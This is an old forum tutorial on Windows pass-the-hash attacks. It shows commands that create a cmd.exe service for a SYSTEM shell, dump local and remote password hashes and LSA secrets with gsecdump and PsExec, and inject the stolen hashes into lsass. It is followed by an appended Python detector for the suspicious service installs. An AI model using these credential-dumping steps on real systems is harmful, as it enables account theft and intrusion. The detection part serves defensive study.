中国网络渗透测试联盟
Title: Hash injection attack
Author: admin
Time: 2012-11-6 21:09
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]              show help
-a [ --dump_all ]          dump all secrets
-l [ --dump_lsa ]          dump lsa secrets
-w [ --dump_wireless ]     dump microsoft wireless connections
-u [ --dump_usedhashes ]   dump hashes from active logon sessions
-s [ --dump_hashes ]       dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process, which carries out the hash injection attack. The foreigners really are good at this; admins will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually do not need to be cracked at all; it is just a matter of using the tool. As the original article puts it well: no matter whether the password is 4 characters or 127, as long as you have the hash it is 100% done.

Original source:
http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
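The post relies on two service-installation artifacts that a defender can watch for: an interactive service whose binary is cmd.exe (the sc create step) and PsExec with -s, which installs its own service on the target. The following is an added detection example, not code from the post or from any of the tools it names. It runs a small rule set over constructed records shaped like Windows System-log Event ID 7045 ("A service was installed in the system"); the field names and every value are assumptions made up for the example, and the PSEXESVC service name is PsExec's well-known artifact rather than something the post shows. Because the 7045 body does not expose the interactive flag, the rules key on the image path and service name instead.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample records in the shape of Event ID 7045 from the Windows
# System log. The fields mirror the event body; the values are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "shellcmdline",
     "ImagePath": r"C:\WINDOWS\system32\cmd.exe /K start",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"EventID": "7045", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"EventID": "7045", "ServiceName": "UpdateAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service',
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"EventID": "7045", "ServiceName": "svcstage",
     "ImagePath": r"C:\Users\Public\stage.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    # Not an install event; the detector must skip it.
    {"EventID": "7036", "ServiceName": "Spooler", "ImagePath": "",
     "ServiceType": "", "StartType": "", "AccountName": ""},
]

# Interpreters that have no business being a service's own binary.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "mshta.exe"}
# Directory fragments that ordinary users can write to.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")


@dataclass
class Finding:
    service_name: str
    image_path: str
    reasons: List[str] = field(default_factory=list)


def executable_path(image_path: str) -> str:
    """Strip arguments from a service ImagePath, honouring a quoted path."""
    m = re.match(r'\s*"?(.*?\.(?:exe|dll|bat|cmd))\b', image_path, re.IGNORECASE)
    if m:
        return m.group(1)
    return image_path.strip().strip('"').split(" ", 1)[0]


def detect_suspicious_services(events: List[Dict[str, str]]) -> List[Finding]:
    """Apply the three rules to 7045 records and return one Finding per hit."""
    findings: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != "7045":
            continue
        image = ev.get("ImagePath", "")
        exe = executable_path(image)
        base = ntpath.basename(exe).lower()
        name = ev.get("ServiceName", "")
        reasons: List[str] = []
        if base in SHELL_IMAGES:
            reasons.append("shell_as_service")      # sc create ... cmd.exe pattern
        if name.lower() == "psexesvc" or base == "psexesvc.exe":
            reasons.append("psexec_service")        # PsExec -s installs PSEXESVC
        if any(frag in exe.lower() for frag in USER_WRITABLE):
            reasons.append("user_writable_path")    # binary staged where users can write
        if reasons:
            findings.append(Finding(name, image, reasons))
    return findings


if __name__ == "__main__":
    for f in detect_suspicious_services(SAMPLE_EVENTS):
        print(f"{f.service_name:<14} {', '.join(f.reasons):<32} {f.image_path}")
```

In practice the records would come from an EVTX export or a SIEM query rather than the inline list; the rules themselves are cheap enough to run on every 7045 event, and the shellcmdline case in the post would be caught by the first rule alone, even though the service never started successfully.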
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)